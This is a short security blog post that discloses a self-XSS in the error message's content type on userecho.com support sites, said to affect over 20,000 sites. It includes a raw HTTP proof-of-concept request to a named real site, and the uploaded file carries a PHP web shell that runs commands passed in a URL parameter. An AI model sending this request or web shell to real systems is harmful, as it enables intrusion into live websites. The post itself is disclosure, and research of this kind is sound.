Self XSS in error Content-Type on 20 000 + websites (en)

Continuing my previous post https://securityz.wordpress.com/2017/01/10/iframe_injection_20000/  .

Self xss vulnerability in the support userecho.com sites.

Select the boot image, trying to load the shell, but get an error File type is not supported for image: application / octet-stream.

It’s like xss in the file name, but here xss in the content type.

PoC:

POST /upload/content/image/6/ HTTP/1.1
Host: support.gismeteo.ru
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 288
Content-Type: multipart/form-data; boundary=—————————20589225426059
Cookie: uesessionid=hyfzrsuchqs7nckrbk1oeuijs1muyyct; csrftoken=B1zifrapMiiITZqW5WVtjD4Ye5Qn3Vv0v7iol6d75rcNLnKSMyLoFSgyuWXeVTky
Referer: https://yahoo.com/
Connection: close

—————————–20589225426059
Content-Disposition: form-data; name=”content”; filename=”shell3.php”
Content-Type: application/octet-stream

<? if($_GET[‘cmd’]) { system($_GET[‘cmd’]); } ?>
—————————–20589225426059–

Vulnerability is at more than 20,000 sites and the sites of this http://userecho.com/clients/?lang=ru list. Support is not considered dangerous, and this vulnerability has decided not to fix it.

Video https://www.youtube.com/watch?v=gqt4TzUUw8Q .

Subscribe https://twitter.com/MaximYaremchuk for more articles)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s